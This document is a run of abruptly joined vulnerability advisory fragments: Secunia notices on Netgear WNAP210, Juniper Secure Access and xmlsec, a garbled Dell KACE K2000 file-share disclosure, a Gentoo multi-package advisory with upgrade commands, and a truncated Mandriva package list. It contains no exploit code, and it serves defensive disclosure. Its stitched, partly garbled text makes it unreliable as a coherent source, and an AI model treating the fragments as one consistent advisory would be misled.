http://secunia.com/advisories/44045/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/44045/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=44045 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two vulnerabilities have been reported in Netgear ProSafe Wireless-N Access Point WNAP210, which can be exploited by malicious people to disclose sensitive information and bypass certain security restrictions. SOLUTION: Update to the latest firmware. Please contact the vendor for more details. PROVIDED AND/OR DISCOVERED BY: Trevor Seward via US-CERT. ORIGINAL ADVISORY: US-CERT VU#644812: http://www.kb.cert.org/vuls/id/644812 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The Dell KACE K2000 Systems Deployment Appliance 3.3.36822 and earlier contains a peinst CIFS share, which allows remote attackers to obtain sensitive information by reading the (1) unattend.xml or (2) sysprep.inf file, as demonstrated by reading a password. Dell Kace K2000 Systems Deployment Appliance Contains a vulnerability. Dell Kace K2000 Systems Deployment Appliance Is Windows You are using a file share for installation. This file share has a hidden attribute, Windows Contains files used at startup. Access to this file share is not restricted and may be accessed without authentication. In addition, Dell The following vulnerability information has been released. This hidden, read-only fileshare is populated with pre- and post-installation tasks as well as deployment bootfiles and media used for Windows network operating system installs (called "Scripted Installs") and imaging (called "K-images"). This fileshare is hidden. Dell Kace K2000 is prone to a remote information-disclosure vulnerability. Attackers can exploit this issue to obtain potentially sensitive information that may lead to further attacks

Juniper Networks' Secure Access is an enterprise-class SSL VPN access device running on Juniper IVE OS. There is an unspecified error in the Network Connect Credential Provider implementation provided by Juniper Networks Secure Access, which can be exploited by remote attackers to bypass authentication on Windows 7 and Windows Vista. ---------------------------------------------------------------------- Secunia Research and vulnerability disclosures coordinated by Secunia: http://secunia.com/research/ ---------------------------------------------------------------------- TITLE: Juniper IVE Network Connect Credential Provider Security Bypass SECUNIA ADVISORY ID: SA43983 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43983/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43983 RELEASE DATE: 2011-04-02 DISCUSS ADVISORY: http://secunia.com/advisories/43983/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43983/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43983 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Juniper Networks Secure Access, which can be exploited by malicious people to bypass certain security restrictions. SOLUTION: Update to version 6.5R9, 7.0R4, or 7.1R1. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.juniper.net/alerts/viewalert.jsp?txtAlertNumber=PSN-2011-03-187&viewMode=view OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

xslt.c in XML Security Library (aka xmlsec) before 1.2.17, as used in WebKit and other products, when XSLT is enabled, allows remote attackers to create or overwrite arbitrary files via vectors involving the libxslt output extension and a ds:Transform element during signature verification. Remote attackers can exploit this issue to read or write to arbitrary XML files. This may lead to further attacks. Versions prior to XML Security Library 1.2.17 are vulnerable. For the oldstable distribution (lenny), this problem has been fixed in version 1.2.9-5+lenny1. For the stable distribution (squeeze), this problem has been fixed in version 1.2.14-1+squeeze1. For the testing distribution (wheezy) and unstable distribution (sid), this problem has been fixed in version 1.2.14-1.1. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. For more information: SA43920 SOLUTION: Apply updated packages via the apt-get package manager. ---------------------------------------------------------------------- Secunia Research and vulnerability disclosures coordinated by Secunia: http://secunia.com/research/ ---------------------------------------------------------------------- TITLE: XML Security Library XSLT File Access Vulnerability SECUNIA ADVISORY ID: SA43920 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43920/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43920 RELEASE DATE: 2011-04-02 DISCUSS ADVISORY: http://secunia.com/advisories/43920/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43920/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43920 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in the XML Security Library, which can be exploited by malicious people to compromise a vulnerable system. SOLUTION: Update to version 1.2.17. PROVIDED AND/OR DISCOVERED BY: The vendor credits Nicolas Gregoire. ORIGINAL ADVISORY: http://www.aleksey.com/pipermail/xmlsec/2011/009120.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201412-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Multiple packages, Multiple vulnerabilities fixed in 2011 Date: December 11, 2014 Bugs: #194151, #294253, #294256, #334087, #344059, #346897, #350598, #352608, #354209, #355207, #356893, #358611, #358785, #358789, #360891, #361397, #362185, #366697, #366699, #369069, #370839, #372971, #376793, #381169, #386321, #386361 ID: 201412-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== This GLSA contains notification of vulnerabilities found in several Gentoo packages which have been fixed prior to January 1, 2012. The worst of these vulnerabilities could lead to local privilege escalation and remote code execution. Please see the package list and CVE identifiers below for more information. Background ========== For more information on the packages listed in this GLSA, please see their homepage referenced in the ebuild. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 games-sports/racer-bin >= 0.5.0-r1 Vulnerable! 2 media-libs/fmod < 4.38.00 >= 4.38.00 3 dev-php/PEAR-Mail < 1.2.0 >= 1.2.0 4 sys-fs/lvm2 < 2.02.72 >= 2.02.72 5 app-office/gnucash < 2.4.4 >= 2.4.4 6 media-libs/xine-lib < 1.1.19 >= 1.1.19 7 media-sound/lastfmplayer < 1.5.4.26862-r3 >= 1.5.4.26862-r3 8 net-libs/webkit-gtk < 1.2.7 >= 1.2.7 9 sys-apps/shadow < 4.1.4.3 >= 4.1.4.3 10 dev-php/PEAR-PEAR < 1.9.2-r1 >= 1.9.2-r1 11 dev-db/unixODBC < 2.3.0-r1 >= 2.3.0-r1 12 sys-cluster/resource-agents < 1.0.4-r1 >= 1.0.4-r1 13 net-misc/mrouted < 3.9.5 >= 3.9.5 14 net-misc/rsync < 3.0.8 >= 3.0.8 15 dev-libs/xmlsec < 1.2.17 >= 1.2.17 16 x11-apps/xrdb < 1.0.9 >= 1.0.9 17 net-misc/vino < 2.32.2 >= 2.32.2 18 dev-util/oprofile < 0.9.6-r1 >= 0.9.6-r1 19 app-admin/syslog-ng < 3.2.4 >= 3.2.4 20 net-analyzer/sflowtool < 3.20 >= 3.20 21 gnome-base/gdm < 3.8.4-r3 >= 3.8.4-r3 22 net-libs/libsoup < 2.34.3 >= 2.34.3 23 app-misc/ca-certificates < 20110502-r1 >= 20110502-r1 24 dev-vcs/gitolite < 1.5.9.1 >= 1.5.9.1 25 dev-util/qt-creator < 2.1.0 >= 2.1.0 ------------------------------------------------------------------- NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers. ------------------------------------------------------------------- 25 affected packages Description =========== Vulnerabilities have been discovered in the packages listed below. Please review the CVE identifiers in the Reference section for details. * FMOD Studio * PEAR Mail * LVM2 * GnuCash * xine-lib * Last.fm Scrobbler * WebKitGTK+ * shadow tool suite * PEAR * unixODBC * Resource Agents * mrouted * rsync * XML Security Library * xrdb * Vino * OProfile * syslog-ng * sFlow Toolkit * GNOME Display Manager * libsoup * CA Certificates * Gitolite * QtCreator * Racer Impact ====== A context-dependent attacker may be able to gain escalated privileges, execute arbitrary code, cause Denial of Service, obtain sensitive information, or otherwise bypass security restrictions. Workaround ========== There are no known workarounds at this time. Resolution ========== All FMOD Studio users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/fmod-4.38.00" All PEAR Mail users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-php/PEAR-Mail-1.2.0" All LVM2 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=sys-fs/lvm2-2.02.72" All GnuCash users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-office/gnucash-2.4.4" All xine-lib users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/xine-lib-1.1.19" All Last.fm Scrobbler users should upgrade to the latest version: # emerge --sync # emerge -a --oneshot -v ">=media-sound/lastfmplayer-1.5.4.26862-r3" All WebKitGTK+ users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-1.2.7" All shadow tool suite users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=sys-apps/shadow-4.1.4.3" All PEAR users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-php/PEAR-PEAR-1.9.2-r1" All unixODBC users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-db/unixODBC-2.3.0-r1" All Resource Agents users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=sys-cluster/resource-agents-1.0.4-r1" All mrouted users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/mrouted-3.9.5" All rsync users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/rsync-3.0.8" All XML Security Library users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/xmlsec-1.2.17" All xrdb users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=x11-apps/xrdb-1.0.9" All Vino users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/vino-2.32.2" All OProfile users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-util/oprofile-0.9.6-r1" All syslog-ng users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-admin/syslog-ng-3.2.4" All sFlow Toolkit users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/sflowtool-3.20" All GNOME Display Manager users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=gnome-base/gdm-3.8.4-r3" All libsoup users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/libsoup-2.34.3" All CA Certificates users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=app-misc/ca-certificates-20110502-r1" All Gitolite users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-vcs/gitolite-1.5.9.1" All QtCreator users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-util/qt-creator-2.1.0" Gentoo has discontinued support for Racer. We recommend that users unmerge Racer: # emerge --unmerge "games-sports/racer-bin" NOTE: This is a legacy GLSA. Updates for all affected architectures have been available since 2012. It is likely that your system is already no longer affected by these issues. References ========== [ 1 ] CVE-2007-4370 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4370 [ 2 ] CVE-2009-4023 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4023 [ 3 ] CVE-2009-4111 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4111 [ 4 ] CVE-2010-0778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0778 [ 5 ] CVE-2010-1780 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1780 [ 6 ] CVE-2010-1782 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1782 [ 7 ] CVE-2010-1783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1783 [ 8 ] CVE-2010-1784 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1784 [ 9 ] CVE-2010-1785 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1785 [ 10 ] CVE-2010-1786 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1786 [ 11 ] CVE-2010-1787 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1787 [ 12 ] CVE-2010-1788 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1788 [ 13 ] CVE-2010-1790 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1790 [ 14 ] CVE-2010-1791 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1791 [ 15 ] CVE-2010-1792 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1792 [ 16 ] CVE-2010-1793 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1793 [ 17 ] CVE-2010-1807 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1807 [ 18 ] CVE-2010-1812 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1812 [ 19 ] CVE-2010-1814 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1814 [ 20 ] CVE-2010-1815 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1815 [ 21 ] CVE-2010-2526 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2526 [ 22 ] CVE-2010-2901 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2901 [ 23 ] CVE-2010-3255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3255 [ 24 ] CVE-2010-3257 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3257 [ 25 ] CVE-2010-3259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3259 [ 26 ] CVE-2010-3362 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3362 [ 27 ] CVE-2010-3374 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3374 [ 28 ] CVE-2010-3389 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3389 [ 29 ] CVE-2010-3812 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3812 [ 30 ] CVE-2010-3813 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3813 [ 31 ] CVE-2010-3999 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3999 [ 32 ] CVE-2010-4042 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4042 [ 33 ] CVE-2010-4197 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4197 [ 34 ] CVE-2010-4198 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4198 [ 35 ] CVE-2010-4204 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4204 [ 36 ] CVE-2010-4206 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4206 [ 37 ] CVE-2010-4492 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4492 [ 38 ] CVE-2010-4493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4493 [ 39 ] CVE-2010-4577 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4577 [ 40 ] CVE-2010-4578 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4578 [ 41 ] CVE-2011-0007 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0007 [ 42 ] CVE-2011-0465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0465 [ 43 ] CVE-2011-0482 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0482 [ 44 ] CVE-2011-0721 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0721 [ 45 ] CVE-2011-0727 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0727 [ 46 ] CVE-2011-0904 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0904 [ 47 ] CVE-2011-0905 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0905 [ 48 ] CVE-2011-1072 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1072 [ 49 ] CVE-2011-1097 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1097 [ 50 ] CVE-2011-1144 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1144 [ 51 ] CVE-2011-1425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1425 [ 52 ] CVE-2011-1572 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1572 [ 53 ] CVE-2011-1760 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1760 [ 54 ] CVE-2011-1951 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1951 [ 55 ] CVE-2011-2471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2471 [ 56 ] CVE-2011-2472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2472 [ 57 ] CVE-2011-2473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2473 [ 58 ] CVE-2011-2524 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2524 [ 59 ] CVE-2011-3365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3365 [ 60 ] CVE-2011-3366 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3366 [ 61 ] CVE-2011-3367 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3367 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201412-09.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490 The updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1425 _______________________________________________________________________ Updated Packages: Mandriva Linux 2009.0: ab2caef2b723f8a627f4682e9b9b295c 2009.0/i586/libxmlsec1-1-1.2.10-7.3mdv2009.0.i586.rpm a82fe9a2eb07213a40d5b062d0c5a230 2009.0/i586/libxmlsec1-devel-1.2.10-7.3mdv2009.0.i586.rpm 2cec5cb556b742bcc87d10a14ded022c 2009.0/i586/libxmlsec1-gnutls1-1.2.10-7.3mdv2009.0.i586.rpm 7169d872a13bb5da168cad113ca3c9cb 2009.0/i586/libxmlsec1-gnutls-devel-1.2.10-7.3mdv2009.0.i586.rpm d9c9fe192a991bb7937fce742acac213 2009.0/i586/libxmlsec1-nss1-1.2.10-7.3mdv2009.0.i586.rpm c412b1cf110d47b6c9848a2718394e83 2009.0/i586/libxmlsec1-nss-devel-1.2.10-7.3mdv2009.0.i586.rpm fb3fcd72027a0c4707d185c03d7e6ffe 2009.0/i586/libxmlsec1-openssl1-1.2.10-7.3mdv2009.0.i586.rpm ee2375b5ce6b80fb0a37f8a298df8ffc 2009.0/i586/libxmlsec1-openssl-devel-1.2.10-7.3mdv2009.0.i586.rpm 45ec8c67b589d6874c265c316f0ef715 2009.0/i586/xmlsec1-1.2.10-7.3mdv2009.0.i586.rpm 00a18a237c5aee09d3de790df4ee8d0b 2009.0/SRPMS/xmlsec1-1.2.10-7.3mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: ab200f5369469e19e89743b23a097764 2009.0/x86_64/lib64xmlsec1-1-1.2.10-7.3mdv2009.0.x86_64.rpm 15eb2c4424a6d91b68f5caef8db2fdff 2009.0/x86_64/lib64xmlsec1-devel-1.2.10-7.3mdv2009.0.x86_64.rpm ad73f2e06650f4b76b482a1bf7532eac 2009.0/x86_64/lib64xmlsec1-gnutls1-1.2.10-7.3mdv2009.0.x86_64.rpm 7c60997091a4214148c77d2d14c01a94 2009.0/x86_64/lib64xmlsec1-gnutls-devel-1.2.10-7.3mdv2009.0.x86_64.rpm 22ac198274c38732b3f0a65e5814ffc7 2009.0/x86_64/lib64xmlsec1-nss1-1.2.10-7.3mdv2009.0.x86_64.rpm ddb61026f298b57254192f25398498d6 2009.0/x86_64/lib64xmlsec1-nss-devel-1.2.10-7.3mdv2009.0.x86_64.rpm a965cb539117930426efb7b6dbf8553d 2009.0/x86_64/lib64xmlsec1-openssl1-1.2.10-7.3mdv2009.0.x86_64.rpm a2853268d49f512f660b0c85f32f3b98 2009.0/x86_64/lib64xmlsec1-openssl-devel-1.2.10-7.3mdv2009.0.x86_64.rpm cfcb56269c2b2e79ea2701839fa93090 2009.0/x86_64/xmlsec1-1.2.10-7.3mdv2009.0.x86_64.rpm 00a18a237c5aee09d3de790df4ee8d0b 2009.0/SRPMS/xmlsec1-1.2.10-7.3mdv2009.0.src.rpm Mandriva Linux 2010.0: bdc91e075985a73525da8a27c50f3e4d 2010.0/i586/libxmlsec1-1-1.2.13-1.2mdv2010.0.i586.rpm a8cf6ac42e0ae7df962f3b6e1abd0a27 2010.0/i586/libxmlsec1-devel-1.2.13-1.2mdv2010.0.i586.rpm 50e1f9b8c2b36781b5597c37756f0a27 2010.0/i586/libxmlsec1-gnutls1-1.2.13-1.2mdv2010.0.i586.rpm 94b518a20f8d6a99033be5c7fa9a561c 2010.0/i586/libxmlsec1-gnutls-devel-1.2.13-1.2mdv2010.0.i586.rpm b5e93f5674d8b2065e64f2e53ba05605 2010.0/i586/libxmlsec1-nss1-1.2.13-1.2mdv2010.0.i586.rpm 880fe166f23413733c3c3c118d816387 2010.0/i586/libxmlsec1-nss-devel-1.2.13-1.2mdv2010.0.i586.rpm 21b46e66c6b78df3fbcd86064cf30e7c 2010.0/i586/libxmlsec1-openssl1-1.2.13-1.2mdv2010.0.i586.rpm 6620368f5cc3bcbb857b4a23eac3c8ca 2010.0/i586/libxmlsec1-openssl-devel-1.2.13-1.2mdv2010.0.i586.rpm c2ea73966298d29fdfdc34c7c2a2f1c2 2010.0/i586/xmlsec1-1.2.13-1.2mdv2010.0.i586.rpm 877a15d6552bedb5763df240f4d82d84 2010.0/SRPMS/xmlsec1-1.2.13-1.2mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: a62d421d4fd1899fbba01309dbaf1896 2010.0/x86_64/lib64xmlsec1-1-1.2.13-1.2mdv2010.0.x86_64.rpm 2f537e7a96421519da35174c233ce595 2010.0/x86_64/lib64xmlsec1-devel-1.2.13-1.2mdv2010.0.x86_64.rpm 7a8b160fe2e6034be36f6eae79085ace 2010.0/x86_64/lib64xmlsec1-gnutls1-1.2.13-1.2mdv2010.0.x86_64.rpm 0a6294fd609fc0852648a497a88483c0 2010.0/x86_64/lib64xmlsec1-gnutls-devel-1.2.13-1.2mdv2010.0.x86_64.rpm 29db3a07cccce7ad181397aad0cc8d0d 2010.0/x86_64/lib64xmlsec1-nss1-1.2.13-1.2mdv2010.0.x86_64.rpm fbbf15dc907548874aa56a0a60288c44 2010.0/x86_64/lib64xmlsec1-nss-devel-1.2.13-1.2mdv2010.0.x86_64.rpm 91cde9b85b74ee50ca22063395776ad5 2010.0/x86_64/lib64xmlsec1-openssl1-1.2.13-1.2mdv2010.0.x86_64.rpm 48200b7dbaf54a0f3b773fe838bba047 2010.0/x86_64/lib64xmlsec1-openssl-devel-1.2.13-1.2mdv2010.0.x86_64.rpm 959b3952c7246d48878bd70d51966a8e 2010.0/x86_64/xmlsec1-1.2.13-1.2mdv2010.0.x86_64.rpm 877a15d6552bedb5763df240f4d82d84 2010.0/SRPMS/xmlsec1-1.2.13-1.2mdv2010.0.src.rpm Mandriva Enterprise Server 5: 319b4ab924dbbbf82f4614d148f14804 mes5/i586/libxmlsec1-1-1.2.10-7.3mdvmes5.2.i586.rpm 9278a1efe02a044e5ff7a1a37ffa36d4 mes5/i586/libxmlsec1-devel-1.2.10-7.3mdvmes5.2.i586.rpm cb993560c51e070393b7e2e0861900ff mes5/i586/libxmlsec1-gnutls1-1.2.10-7.3mdvmes5.2.i586.rpm 293f8773291935a45d76908db7825384 mes5/i586/libxmlsec1-gnutls-devel-1.2.10-7.3mdvmes5.2.i586.rpm aab3eb1ab4455876a2339e9863fa7935 mes5/i586/libxmlsec1-nss1-1.2.10-7.3mdvmes5.2.i586.rpm 2ff66c74e00e7dd79d6037162dde87b8 mes5/i586/libxmlsec1-nss-devel-1.2.10-7.3mdvmes5.2.i586.rpm f2f5866fd188473eb74e33c5b78c2d9a mes5/i586/libxmlsec1-openssl1-1.2.10-7.3mdvmes5.2.i586.rpm c41b9570228f06d39b91d87a8538728c mes5/i586/libxmlsec1-openssl-devel-1.2.10-7.3mdvmes5.2.i586.rpm 308bc571cc766753f0c07a44ca80181c mes5/i586/xmlsec1-1.2.10-7.3mdvmes5.2.i586.rpm d07141a9abde87df9f330093acd2d59f mes5/SRPMS/xmlsec1-1.2.10-7.3mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 327e47c32620609fd4245c32475938c7 mes5/x86_64/lib64xmlsec1-1-1.2.10-7.3mdvmes5.2.x86_64.rpm 033b408efc5436eb5d6e09a9582760a5 mes5/x86_64/lib64xmlsec1-devel-1.2.10-7.3mdvmes5.2.x86_64.rpm 814d8c33a387f72d855f7bfc250f74e3 mes5/x86_64/lib64xmlsec1-gnutls1-1.2.10-7.3mdvmes5.2.x86_64.rpm 2883ed21f25132b542780bd1dfccfb17 mes5/x86_64/lib64xmlsec1-gnutls-devel-1.2.10-7.3mdvmes5.2.x86_64.rpm 